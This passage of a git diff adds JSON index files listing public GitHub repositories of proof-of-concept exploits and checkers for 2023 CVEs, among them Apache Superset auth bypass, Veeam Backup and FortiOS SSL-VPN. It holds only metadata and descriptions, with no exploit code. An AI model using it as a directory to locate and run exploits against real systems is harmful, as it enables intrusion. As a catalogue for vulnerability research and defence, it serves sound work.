0000000000..04e7467ab0 --- /dev/null +++ b/2023/CVE-2023-27524.json @@ -0,0 +1,387 @@ +[ + { + "id": 632280900, + "name": "CVE-2023-27524", + "full_name": "horizon3ai\/CVE-2023-27524", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-27524", + "description": "Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset", + "fork": false, + "created_at": "2023-04-25T04:59:05Z", + "updated_at": "2024-12-05T12:03:27Z", + "pushed_at": "2023-09-09T01:20:49Z", + "stargazers_count": 105, + "watchers_count": 105, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 105, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 633268252, + "name": "Superset_auth_bypass_check", + "full_name": "Okaytc\/Superset_auth_bypass_check", + "owner": { + "login": "Okaytc", + "id": 50813688, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813688?v=4", + "html_url": "https:\/\/github.com\/Okaytc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Okaytc\/Superset_auth_bypass_check", + "description": "Apahce-Superset身份认证绕过漏洞(CVE-2023-27524)检测工具", + "fork": false, + "created_at": "2023-04-27T06:21:00Z", + "updated_at": "2023-09-28T15:09:36Z", + "pushed_at": "2023-08-03T09:52:22Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633292629, + "name": "CVE-2023-27524", + "full_name": "ZZ-SOCMAP\/CVE-2023-27524", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2023-27524", + "description": "Apache Superset Auth Bypass Vulnerability CVE-2023-27524.", + "fork": false, + "created_at": "2023-04-27T07:31:40Z", + "updated_at": "2024-09-19T01:43:06Z", + "pushed_at": "2023-04-27T07:31:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 636271031, + "name": "CVE-2023-27524-POC", + "full_name": "MaanVader\/CVE-2023-27524-POC", + "owner": { + "login": "MaanVader", + "id": 103140982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103140982?v=4", + "html_url": "https:\/\/github.com\/MaanVader", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaanVader\/CVE-2023-27524-POC", + "description": "A POC for the all new CVE-2023-27524 which allows for authentication bypass and gaining access to the admin dashboard.", + "fork": false, + "created_at": "2023-05-04T13:29:09Z", + "updated_at": "2023-05-04T13:37:40Z", + "pushed_at": "2023-05-04T13:36:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636446962, + "name": "CVE-2023-27524", + "full_name": "ThatNotEasy\/CVE-2023-27524", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-27524", + "description": "Perform With Apache-SuperSet Leaked Token [CSRF]", + "fork": false, + "created_at": "2023-05-04T21:43:48Z", + "updated_at": "2024-08-12T20:31:11Z", + "pushed_at": "2023-07-24T22:23:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "csrf-tokens", + "superset" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 637902693, + "name": "CVE-2023-27524", + "full_name": "TardC\/CVE-2023-27524", + "owner": { + "login": "TardC", + "id": 16506022, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16506022?v=4", + "html_url": "https:\/\/github.com\/TardC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TardC\/CVE-2023-27524", + "description": "Apache Superset Auth Bypass (CVE-2023-27524)", + "fork": false, + "created_at": "2023-05-08T16:50:08Z", + "updated_at": "2024-11-19T12:13:21Z", + "pushed_at": "2023-05-09T03:13:59Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685257815, + "name": "CVE-2023-27524", + "full_name": "necroteddy\/CVE-2023-27524", + "owner": { + "login": "necroteddy", + "id": 37003131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37003131?v=4", + "html_url": "https:\/\/github.com\/necroteddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/necroteddy\/CVE-2023-27524", + "description": "CVE-2023-27524", + "fork": false, + "created_at": "2023-08-30T20:59:28Z", + "updated_at": "2023-08-30T21:00:37Z", + "pushed_at": "2023-08-30T21:00:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 688800024, + "name": "CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE", + "full_name": "jakabakos\/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE", + "description": null, + "fork": false, + "created_at": "2023-09-08T06:15:00Z", + "updated_at": "2024-11-07T18:03:30Z", + "pushed_at": "2023-09-11T06:49:19Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 702903633, + "name": "Apache-Superset-SECRET_KEY-CVE-2023-27524-", + "full_name": "CN016\/Apache-Superset-SECRET_KEY-CVE-2023-27524-", + "owner": { + "login": "CN016", + "id": 108575004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4", + "html_url": "https:\/\/github.com\/CN016", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CN016\/Apache-Superset-SECRET_KEY-CVE-2023-27524-", + "description": "Apache Superset 默认SECRET_KEY 漏洞(CVE-2023-27524)", + "fork": false, + "created_at": "2023-10-10T08:23:57Z", + "updated_at": "2023-10-10T08:34:01Z", + "pushed_at": "2023-10-10T08:33:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711672389, + "name": "Research-CVE-2023-27524", + "full_name": "h1n4mx0\/Research-CVE-2023-27524", + "owner": { + "login": "h1n4mx0", + "id": 116544941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116544941?v=4", + "html_url": "https:\/\/github.com\/h1n4mx0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1n4mx0\/Research-CVE-2023-27524", + "description": "CVE-2023-27524", + "fork": false, + "created_at": "2023-10-30T00:27:20Z", + "updated_at": "2023-10-30T00:27:21Z", + "pushed_at": "2023-10-30T01:15:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799192194, + "name": "CVE-2023-27524", + "full_name": "karthi-the-hacker\/CVE-2023-27524", + "owner": { + "login": "karthi-the-hacker", + "id": 33289300, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33289300?v=4", + "html_url": "https:\/\/github.com\/karthi-the-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthi-the-hacker\/CVE-2023-27524", + "description": "Tool for finding CVE-2023-27524 (Apache Superset - Authentication Bypass)", + "fork": false, + "created_at": "2024-05-11T12:19:55Z", + "updated_at": "2024-06-25T13:42:04Z", + "pushed_at": "2024-05-11T12:23:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799195135, + "name": "CVE-2023-27524", + "full_name": "Cappricio-Securities\/CVE-2023-27524", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2023-27524", + "description": "Apache Superset - Authentication Bypass", + "fork": false, + "created_at": "2024-05-11T12:29:08Z", + "updated_at": "2024-12-15T09:58:25Z", + "pushed_at": "2024-06-24T07:06:59Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-superset", + "apache-superset---authentication-bypass", + "authentication-bypass", + "bugbounty", + "cve-2023-2752", + "pentesting", + "vapt", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27532.json b/2023/CVE-2023-27532.json new file mode 100644 index 0000000000..5ad3858a52 --- /dev/null +++ b/2023/CVE-2023-27532.json @@ -0,0 +1,95 @@ +[ + { + "id": 615769954, + "name": "CVE-2023-27532", + "full_name": "horizon3ai\/CVE-2023-27532", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2023-27532", + "description": "POC for Veeam Backup and Replication CVE-2023-27532", + "fork": false, + "created_at": "2023-03-18T16:20:53Z", + "updated_at": "2024-12-18T08:53:23Z", + "pushed_at": "2023-03-28T18:21:55Z", + "stargazers_count": 63, + "watchers_count": 63, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 63, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 618036087, + "name": "CVE-2023-27532", + "full_name": "sfewer-r7\/CVE-2023-27532", + "owner": { + "login": "sfewer-r7", + "id": 122022313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122022313?v=4", + "html_url": "https:\/\/github.com\/sfewer-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sfewer-r7\/CVE-2023-27532", + "description": "Exploit for CVE-2023-27532 against Veeam Backup & Replication", + "fork": false, + "created_at": "2023-03-23T16:08:43Z", + "updated_at": "2024-12-23T19:54:11Z", + "pushed_at": "2023-03-23T18:03:27Z", + "stargazers_count": 104, + "watchers_count": 104, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 104, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 824610391, + "name": "CVE-2023-27532-RCE-Only", + "full_name": "puckiestyle\/CVE-2023-27532-RCE-Only", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-27532-RCE-Only", + "description": null, + "fork": false, + "created_at": "2024-07-05T14:00:48Z", + "updated_at": "2024-07-10T11:34:46Z", + "pushed_at": "2024-07-10T11:34:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27564.json b/2023/CVE-2023-27564.json new file mode 100644 index 0000000000..b016825cf6 --- /dev/null +++ b/2023/CVE-2023-27564.json @@ -0,0 +1,33 @@ +[ + { + "id": 781230884, + "name": "exploit-CVE-2023-27564", + "full_name": "david-botelho-mariano\/exploit-CVE-2023-27564", + "owner": { + "login": "david-botelho-mariano", + "id": 48680041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48680041?v=4", + "html_url": "https:\/\/github.com\/david-botelho-mariano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/david-botelho-mariano\/exploit-CVE-2023-27564", + "description": null, + "fork": false, + "created_at": "2024-04-03T01:45:18Z", + "updated_at": "2024-04-03T01:45:18Z", + "pushed_at": "2024-04-03T01:56:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27566.json b/2023/CVE-2023-27566.json new file mode 100644 index 0000000000..9cfa4092c8 --- /dev/null +++ b/2023/CVE-2023-27566.json @@ -0,0 +1,40 @@ +[ + { + "id": 608920501, + "name": "moc3ingbird", + "full_name": "OpenL2D\/moc3ingbird", + "owner": { + "login": "OpenL2D", + "id": 110206125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110206125?v=4", + "html_url": "https:\/\/github.com\/OpenL2D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenL2D\/moc3ingbird", + "description": "MOC3ingbird Exploit for Live2D (CVE-2023-27566)", + "fork": false, + "created_at": "2023-03-03T01:57:28Z", + "updated_at": "2024-12-21T11:03:49Z", + "pushed_at": "2023-09-19T01:12:41Z", + "stargazers_count": 82, + "watchers_count": 82, + "has_discussions": true, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "live2d", + "live2d-cubism", + "live2d-cubism-sdk", + "moc3", + "security-vulnerability" + ], + "visibility": "public", + "forks": 6, + "watchers": 82, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27587.json b/2023/CVE-2023-27587.json new file mode 100644 index 0000000000..7ee94662d8 --- /dev/null +++ b/2023/CVE-2023-27587.json @@ -0,0 +1,33 @@ +[ + { + "id": 614448985, + "name": "CVE-2023-27587-PoC", + "full_name": "vagnerd\/CVE-2023-27587-PoC", + "owner": { + "login": "vagnerd", + "id": 4332906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4332906?v=4", + "html_url": "https:\/\/github.com\/vagnerd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vagnerd\/CVE-2023-27587-PoC", + "description": "The simple PoC of CVE-2023-27587", + "fork": false, + "created_at": "2023-03-15T15:52:20Z", + "updated_at": "2024-01-17T16:04:31Z", + "pushed_at": "2023-03-31T16:44:01Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27703.json b/2023/CVE-2023-27703.json new file mode 100644 index 0000000000..292818c990 --- /dev/null +++ b/2023/CVE-2023-27703.json @@ -0,0 +1,33 @@ +[ + { + "id": 626273931, + "name": "CVE-2023-27703", + "full_name": "happy0717\/CVE-2023-27703", + "owner": { + "login": "happy0717", + "id": 36958703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36958703?v=4", + "html_url": "https:\/\/github.com\/happy0717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happy0717\/CVE-2023-27703", + "description": "CVE-2023-27703 An Android version of pikpak version V1.29.2 element debugging interface leakage vulnerability", + "fork": false, + "created_at": "2023-04-11T06:24:04Z", + "updated_at": "2024-04-12T08:19:06Z", + "pushed_at": "2023-04-11T06:39:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27704.json b/2023/CVE-2023-27704.json new file mode 100644 index 0000000000..88fd67cd85 --- /dev/null +++ b/2023/CVE-2023-27704.json @@ -0,0 +1,33 @@ +[ + { + "id": 626280876, + "name": "CVE-2023-27704", + "full_name": "happy0717\/CVE-2023-27704", + "owner": { + "login": "happy0717", + "id": 36958703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36958703?v=4", + "html_url": "https:\/\/github.com\/happy0717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happy0717\/CVE-2023-27704", + "description": "CVE-2023-27704 Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS)", + "fork": false, + "created_at": "2023-04-11T06:41:58Z", + "updated_at": "2023-04-11T06:41:58Z", + "pushed_at": "2023-04-11T06:46:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27742.json b/2023/CVE-2023-27742.json new file mode 100644 index 0000000000..e827ce6b3c --- /dev/null +++ b/2023/CVE-2023-27742.json @@ -0,0 +1,33 @@ +[ + { + "id": 634735317, + "name": "CVE-2023-27742", + "full_name": "G37SYS73M\/CVE-2023-27742", + "owner": { + "login": "G37SYS73M", + "id": 77768845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4", + "html_url": "https:\/\/github.com\/G37SYS73M", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2023-27742", + "description": "IDURAR ERP\/CRM v1 was discovered to contain a SQL injection vulnerability via the component \/api\/login.", + "fork": false, + "created_at": "2023-05-01T03:35:53Z", + "updated_at": "2023-05-02T14:37:50Z", + "pushed_at": "2023-05-11T07:40:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27746.json b/2023/CVE-2023-27746.json new file mode 100644 index 0000000000..d60e0b3f71 --- /dev/null +++ b/2023/CVE-2023-27746.json @@ -0,0 +1,37 @@ +[ + { + "id": 607771290, + "name": "blackvue-cve-2023", + "full_name": "eyJhb\/blackvue-cve-2023", + "owner": { + "login": "eyJhb", + "id": 25955146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25955146?v=4", + "html_url": "https:\/\/github.com\/eyJhb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eyJhb\/blackvue-cve-2023", + "description": "BlackVue DR750 CVE CVE-2023-27746 CVE-2023-27747 CVE-2023-27748", + "fork": false, + "created_at": "2023-02-28T16:37:33Z", + "updated_at": "2024-10-11T03:35:18Z", + "pushed_at": "2024-02-02T23:35:18Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-27746", + "cve-2023-27747", + "cve-2023-27748" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27842.json b/2023/CVE-2023-27842.json new file mode 100644 index 0000000000..218a885428 --- /dev/null +++ b/2023/CVE-2023-27842.json @@ -0,0 +1,64 @@ +[ + { + "id": 614934943, + "name": "CVE-2023-27842", + "full_name": "tristao-marinho\/CVE-2023-27842", + "owner": { + "login": "tristao-marinho", + "id": 101610912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101610912?v=4", + "html_url": "https:\/\/github.com\/tristao-marinho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tristao-marinho\/CVE-2023-27842", + "description": null, + "fork": false, + "created_at": "2023-03-16T15:59:39Z", + "updated_at": "2023-03-19T00:17:25Z", + "pushed_at": "2023-03-16T16:01:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618977251, + "name": "CVE-2023-27842", + "full_name": "cowsecurity\/CVE-2023-27842", + "owner": { + "login": "cowsecurity", + "id": 74612612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74612612?v=4", + "html_url": "https:\/\/github.com\/cowsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cowsecurity\/CVE-2023-27842", + "description": null, + "fork": false, + "created_at": "2023-03-25T22:25:37Z", + "updated_at": "2023-04-01T15:46:33Z", + "pushed_at": "2023-03-31T21:23:07Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-27997.json b/2023/CVE-2023-27997.json new file mode 100644 index 0000000000..f7e5ad99c2 --- /dev/null +++ b/2023/CVE-2023-27997.json @@ -0,0 +1,281 @@ +[ + { + "id": 654396301, + "name": "CVE-2023-27997-POC", + "full_name": "rio128128\/CVE-2023-27997-POC", + "owner": { + "login": "rio128128", + "id": 136775778, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136775778?v=4", + "html_url": "https:\/\/github.com\/rio128128", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rio128128\/CVE-2023-27997-POC", + "description": "POC FortiOS SSL-VPN buffer overflow vulnerability", + "fork": false, + "created_at": "2023-06-16T03:25:19Z", + "updated_at": "2024-11-22T11:31:43Z", + "pushed_at": "2023-06-16T03:28:34Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654732896, + "name": "CVE-2023-27997-check", + "full_name": "BishopFox\/CVE-2023-27997-check", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/CVE-2023-27997-check", + "description": "Safely detect whether a FortiGate SSL VPN instance is vulnerable to CVE-2023-27997 based on response timing", + "fork": false, + "created_at": "2023-06-16T20:15:36Z", + "updated_at": "2025-01-04T16:05:41Z", + "pushed_at": "2024-05-08T16:17:07Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 131, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 657194011, + "name": "CVE-2023-27997-Check", + "full_name": "imbas007\/CVE-2023-27997-Check", + "owner": { + "login": "imbas007", + "id": 100182585, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100182585?v=4", + "html_url": "https:\/\/github.com\/imbas007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imbas007\/CVE-2023-27997-Check", + "description": null, + "fork": false, + "created_at": "2023-06-22T14:16:44Z", + "updated_at": "2023-07-05T11:29:36Z", + "pushed_at": "2023-06-23T01:39:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 657672773, + "name": "cve-2023-27997", + "full_name": "puckiestyle\/cve-2023-27997", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/cve-2023-27997", + "description": null, + "fork": false, + "created_at": "2023-06-23T15:15:54Z", + "updated_at": "2023-06-23T15:16:12Z", + "pushed_at": "2023-06-23T15:16:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 665271629, + "name": "ShodanFortiOS", + "full_name": "TechinsightsPro\/ShodanFortiOS", + "owner": { + "login": "TechinsightsPro", + "id": 116123212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116123212?v=4", + "html_url": "https:\/\/github.com\/TechinsightsPro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TechinsightsPro\/ShodanFortiOS", + "description": "Search vulnerable FortiOS devices via Shodan (CVE-2023-27997)", + "fork": false, + "created_at": "2023-07-11T20:41:03Z", + "updated_at": "2025-01-03T00:54:38Z", + "pushed_at": "2023-07-11T20:41:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686590287, + "name": "CVE-2023-27997", + "full_name": "Cyb3rEnthusiast\/CVE-2023-27997", + "owner": { + "login": "Cyb3rEnthusiast", + "id": 143934696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143934696?v=4", + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast\/CVE-2023-27997", + "description": "How to get access via CVE-2022-27997", + "fork": false, + "created_at": "2023-09-03T10:01:24Z", + "updated_at": "2023-09-10T10:48:40Z", + "pushed_at": "2023-09-09T09:22:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704142501, + "name": "xortigate-cve-2023-27997", + "full_name": "lexfo\/xortigate-cve-2023-27997", + "owner": { + "login": "lexfo", + "id": 23701097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23701097?v=4", + "html_url": "https:\/\/github.com\/lexfo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lexfo\/xortigate-cve-2023-27997", + "description": "xortigate-cve-2023-27997", + "fork": false, + "created_at": "2023-10-12T16:12:41Z", + "updated_at": "2024-10-10T01:56:11Z", + "pushed_at": "2023-10-12T16:17:23Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 62, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 704180144, + "name": "CVE-2023-27997", + "full_name": "delsploit\/CVE-2023-27997", + "owner": { + "login": "delsploit", + "id": 127108998, + "avatar_url": 